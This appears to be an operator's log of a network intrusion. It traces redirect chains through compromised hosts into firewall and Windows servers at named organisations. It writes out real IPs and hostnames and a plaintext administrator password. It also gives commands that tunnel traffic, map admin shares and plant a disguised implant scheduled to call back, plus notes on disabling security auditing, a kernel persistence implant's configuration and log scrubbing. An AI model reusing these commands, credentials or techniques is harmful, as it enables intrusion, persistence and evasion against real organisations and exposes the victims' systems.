ISP: LK City: Phone: ISP IP: 69.64.59.133 Source IP: FINAL target IP: Ops Machine: LOCALHOST.LOCALDOMAIN Redirecting Method 1: PITCHIMPAIR Redirect Host 1: 212.19.128.4 Redirect Target 1: 80.227.254.202 Redirecting Method 2: INCISION Redirect Host 2: 80.227.254.202 Redirect Target 2: 192.168.206.110 Redirecting Method 3: INCISION Redirect Host 3: 192.168.206.110 Redirect Target 3: 192.168.200.51 BEGIN UNIX OPNOTES: Targets (IP, full domain name, target tags: pitchimpair unsuccessful not_attempted ) : --> 212.19.128.4 ns.itte.kz pitchimpair unix successful ---> 80.227.254.202 ensbdvpn1.festivalcity.net.ae jeepflea_market firewall successful ----> 192.168.206.110 ensbdmgmt1.eastnets.com jeepflea_market windows successful -----> 192.168.200.51 ensbdsl1.eastnets.com jeepflea_market windows successful Ops Machine: WO-CBX-LSR Results: ============== 212.19.128.4 ============== 2012-07-02 19:10:51 UTC - ourtn -eY5U /current/up/noserver -wBIN 212.19.128.4 2012-07-02 19:11:12 UTC - 1:11am up 384 day(s), 8:08, 0 users, load average: 0.12, 0.12, 0.12 Tue Jul 3 01:11:22 GMT-6 2012 Mon Jul 2 19:11:22 GMT 2012 2012-07-02 19:13:27 UTC - checks good, moving on... -tunnel u 12742 80.227.254.202 12742 21385 2012-07-02 21:52:48 UTC - bb ================= 80.227.254.202 ================= ./BLIAR-2110 --lp 127.0.0.1 --implant 127.0.0.1 --idkey /current/bin/FW/OPS/jeepflea_market_80.227.254.202.ssg500.6.2.0r6.0.1341250568.key --sport 21385 --dport 12742 2012-07-02 19:29:26 UTC - opened session with FW 2012-07-02 19:29:32 UTC - uploading pktlk 2012-07-02 19:31:24 UTC - created and opened tunnels ------------------Attacker------------------ | ^ v | Attacker to Firewall Packet Firewall to Attacker Packet Source IP : 212.19.128.4___ Source IP : 80.227.254.201_ Dest IP : 80.227.254.201_ Dest IP : 212.19.128.4___ Source Port: _____ Source Port: _____ Dest Port: _____ Dest Port: _____ | ^ v Iface Num: 1_______ | -------------------------Firewall------------------------- | Iface Num: 1_______ ^ v | Firewall to Target Packet Target to Firewall Packet Source IP : 192.168.206.4__ Source IP : 192.168.206.110 Dest IP : 192.168.206.110 Dest IP : 192.168.206.4__ Source Port: _____ Source Port: _____ Dest Port: _____ Dest Port: _____ | ^ v | -------------------Target------------------- 2012-07-02 21:50:47 UTC - closed and removed tunnel 2012-07-02 21:52:40 UTC - exited session PROJECT=JEEPFLEA_MARKET OPUSER=28366 OPSCHEDULE=12062912151349 SCRUBVER=6.006000029 LOCALHOST.LOCALDOMAIN: scrubhands v. 6.006000029 20120702-1839 ################### SCRUBHANDS v6.006000029 (suite v6.6.0.29 run in /192.168.254.71) command line: : /usr/local/bin/scrubhands -t -S 12062912151349 -I 28366 -p JEEPFLEA_MARKET -n 69.64.44.50,69.64.44.20 69.64.59.133 ################### Final lines of bwmonitor.txt: Mon Jul 2 21:53:27 UTC 2012 RX packets:28141 errors:0 dropped:0 overruns:0 frame:0 RX bytes:9845872 (9.3 MiB) TX bytes:10013872 (9.5 MiB) ################################################### Project: JEEPFLEA_MARKET Date: 7:13 PM 7/2/2012 ### Lines to assist in automated processing # Un-comment the "Op Status" line (the line immediately below this one) to mark this op as unsuccessful #Op Status: Unsuccessful # Un-comment the "Non-Standard" line (the line immediately below this one) to mark this op as a non-standard #Non-Standard: True ################################################### Targets: Results: ================ 192.168.206.110 ================ 7:37 PM 7/2/2012 - ----====**** CORDIALFLIMSY TRIGGER BEGIN ****====---- Target Address : 80.227.254.201 Source Address : 212.19.128.4 Target Protocol : ICMP ICMP type,code : 8,0 Keyfile : D:\DSZOPSDisk\Resources\Pc\Keys\jeepflea_market\private_key.bin Callback Address : 192.168.206.4 Callback Dst Port : 34519 Callback Src Port : 0 Redirect through : 192.168.254.71:555 Final Destination : 192.168.208.10 Id : 0x0000000100010c30 Packet Trailer : 0x3f46 7:39 PM 7/2/2012 - win2k8 sp2 7:39 PM 7/2/2012 - Uptime: 12 days, 19 hours, 14 minutes, 22 seconds Idle : 12 days, 19 hours, 14 minutes, 25 seconds 7:41 PM 7/2/2012 - unknown procs: D:\Program Files\Symantec\Backup Exec | LUGetUpdatesExe.exe -belongs to product Symantec Backup Exec? for Windows Servers other unknown procs, previously researched. 7:43 PM 7/2/2012 - PSP: Symantec Endpoint Protection | Symantec Corporation | 11.0.6005.562 7:44 PM 7/2/2012 - Security auditing has been dorked. 7:51 PM 7/2/2012 - winsurvey done, hour clean 9:41 PM 7/2/2012 - final hour clean 9:46 PM 7/2/2012 - q & d ================== 192.168.200.51 ================== 7:53 PM 7/2/2012 - ping timed out 7:53 PM 7/2/2012 - ENSBDSL1 UNIQUE REGISTERED Workstation Service WORKGROUP GROUP REGISTERED Domain Name ENSBDSL1 UNIQUE REGISTERED File Server Service 7:54 PM 7/2/2012 - NativeOS: Windows Server 2008 R2 Standard 7600 7:56 PM 7/2/2012 - gonna try to ZB this guy 7:56 PM 7/2/2012 - shares -target 192.168.200.51 -map C$ -credentials administrator ^enSBSX11^ "" -method netuse 7:58 PM 7/2/2012 - unknown procs from pulist HV_Service.exe - Hypervisor Boot Driver by Microsoft 8:14 PM 7/2/2012 - putting egg up on targ put D:\Logs\jeepflea_market\z0.0.0.1\Payloads\PeddleCheap_2012_07_02_20h00m10s\PC_Level3_exe.configured -name \\192.168.200.51\C$\windows\syswow64\mshta64.exe -permanent scheduler -add 2 C:\windows\syswow64\mshta64.exe -target 192.168.200.51 8:16 PM 7/2/2012 - BOOM!, got the callback 8:17 PM 7/2/2012 - WIN2k8 sp 0 8:17 PM 7/2/2012 - Uptime: 11 days, 0 hours, 27 minutes, 55 seconds Idle : 11 days, 0 hours, 27 minutes, 56 seconds 8:18 PM 7/2/2012 - unknown procs: C:\Program Files (x86)\TurboFTP | TurboFTP.exe - TurboSoft, Inc. belonging to product TurboFTP Application. C:\Program Files (x86)\Symantec\Symantec Endpoint Protection | ProtectionUtilSurrogate.exe - related to Symantec D:\Double-Take\Service | CoreManagementService.exe - related to SWIFT service D:\Double-Take | DoubleTake.exe - Related to SWIFT services D:\Double-Take\Hyper-V | HV_Service.exe - Hypervisor Boot Driver by Microsoft 8:23 PM 7/2/2012 - PSP: | Symantec Backup Exec Remote Agent for Windows Systems | Symantec Corporation | 12.5.2213 | | Symantec Endpoint Protection | Symantec Corporation | 11.0.6005.562 | | LiveUpdate 3.3 (Symantec Corporation) | Symantec Corporation | 3.3.0.96 | 8:23 PM 7/2/2012 - Security auditing has been dorked. 8:25 PM 7/2/2012 - unknown drivers: \SystemRoot\system32\DRIVERS | RepHsm.sys - belongs to product Double-Take, HSM Minifilter \SystemRoot\system32\DRIVERS | RepDac.sys - belongs to Double-Take, Access Minifilter \SystemRoot\system32\DRIVERS | RepDrv.sys - belongs to Double-Take, Replication Minifilter \SystemRoot\system32\DRIVERS | RepKap.sys - belongs to Double-Take, Kernel Access Provider Minifilter (x86). 8:31 PM 7/2/2012 - - Memory Load : 17%% 8:33 PM 7/2/2012 - winsurvey done, hour clean 9:06 PM 7/2/2012 - trying to install with KISU and FLAV 9:06 PM 7/2/2012 - wtf....just dropped connection while trying to install...no bueno 9:11 PM 7/2/2012 - Security auditing has been dorked. 9:13 PM 7/2/2012 - trying install one more time...blew up again 9:14 PM 7/2/2012 - back up again 9:20 PM 7/2/2012 - KISU_config= - KiSu Id: 0x7a43e1fa (PC) - Version: 2.1.8.8 - Kernel Module Loader: - Registry Key: \registry\machine\SYSTEM\CurrentControlSet\Services\viaide\Parameters - Registry Value: {ECC6AAA2-D4B1-9937-2A3A-017CE482A890} - User Module Loader: - Registry Key: - Registry Value: - Module Store Directory: - Registry Key: \registry\machine\SYSTEM\CurrentControlSet\Services\ql2300\Parameters - Registry Value: {33A51B15-8DE5-3F99-1375-A07D75741CDF} - Launcher: - Service Name: secdrv - Registry Value: {ECC6AAA2-D4B1-9937-2A3A-017CE482A890} - - Module Id Size Order Flags Name Process - ===================================================================== - 0xab3f907f 85504 0 U EC UserModuleLoader 64-Bit - 0xbb397f34 20 0 ECL Persistence Identifier - 0xbb397f32 83456 0 U EC UserModuleLoader 32-Bit - 0xbb397f33 83968 0 AD EC BroughtHotshot - B: BootStart, S: SystemStart, A: AutoStart, D: KernelDriver - U: UserMode, R: SystemMode, K: ServiceKey, E: Encrypted - C: Compressed, L: DemandLoad, O: AutoStart Once 9:20 PM 7/2/2012 - install failed : * File: D:\DSZOPSDisk\Resources\Pc\Scripts\Install\winnt\_Install.dss | Line: 354 * Script terminated while running IF * File: D:\DSZOPSDisk\Resources\Pc\Scripts\Install\winnt\_Install.dss | Line: 352 * Script terminated while running IF * File: D:\DSZOPSDisk\Resources\Pc\Scripts\Install\winnt\_Install.dss | Line: 350 * Script terminated while running IF * File: D:\DSZOPSDisk\Resources\Dsz\Scripts\Include\_Menu.dsi | Line: 382 * Failed to get first value for compare. * File: D:\DSZOPSDisk\Resources\Dsz\Scripts\Include\_Menu.dsi | Line: 512 * Failed to get first value for compare. * File: D:\DSZOPSDisk\Resources\Dsz\Scripts\Include\_Menu.dsi | Line: 476 * Script terminated while running IF * File: D:\DSZOPSDisk\Resources\Dsz\Scripts\Include\_Menu.dsi | Line: 404 * Script terminated while running WHILE * File: D:\DSZOPSDisk\Resources\Pc\Scripts\Install\winnt\_Install.dss | Line: 104 * Failed to get first value for compare. * Failed to run code! 9:20 PM 7/2/2012 - trying one last time with no flav 9:22 PM 7/2/2012 - tried connecting to KISU during install, * File: D:\DSZOPSDisk\Resources\Pc\Scripts\Install\winnt\_Install.dss | Line: 518 * Script terminated while running IF * File: D:\DSZOPSDisk\Resources\Dsz\Scripts\Include\_Menu.dsi | Line: 382 * Failed to get first value for compare. * File: D:\DSZOPSDisk\Resources\Dsz\Scripts\Include\_Menu.dsi | Line: 512 * Failed to get first value for compare. * File: D:\DSZOPSDisk\Resources\Dsz\Scripts\Include\_Menu.dsi | Line: 476 * Script terminated while running IF * File: D:\DSZOPSDisk\Resources\Dsz\Scripts\Include\_Menu.dsi | Line: 404 * Script terminated while running WHILE * File: D:\DSZOPSDisk\Resources\Pc\Scripts\Install\winnt\_Install.dss | Line: 104 * Failed to get first value for compare. * Failed to run code! 9:29 PM 7/2/2012 - cutting my losses, q&d 100011972 #### # Lines to assist in techsums # NOTEs and ERRORs will automatically generate a techsum # You can also enclose any portion of your opnotes in a block to have that section be included in the # techsum automatically. Like so: # # Bad things happened. # Then more bad things happened. # Then it _really_ got bad. # # Please keep the and on separate lines # Um...also, those angle brackets (< and >) are actually there, unlike the formats below #### ################################################### # # Create lines like the following (without #) to create targetnotes files # Targetnotes files are found in the directory as targetnotes.txt; you can also create them directly. # They will be read to automate actions in future ops. # # General note to operators #NOTE (): # # Do not run this command (it will cause problems on this box) #DONOTRUN (): # # This command caused an error (bring it to the attention of the developer) #ERROR (): # # This process runs all the time and is harmless #IGNORE (): # # This process was identified #ID: =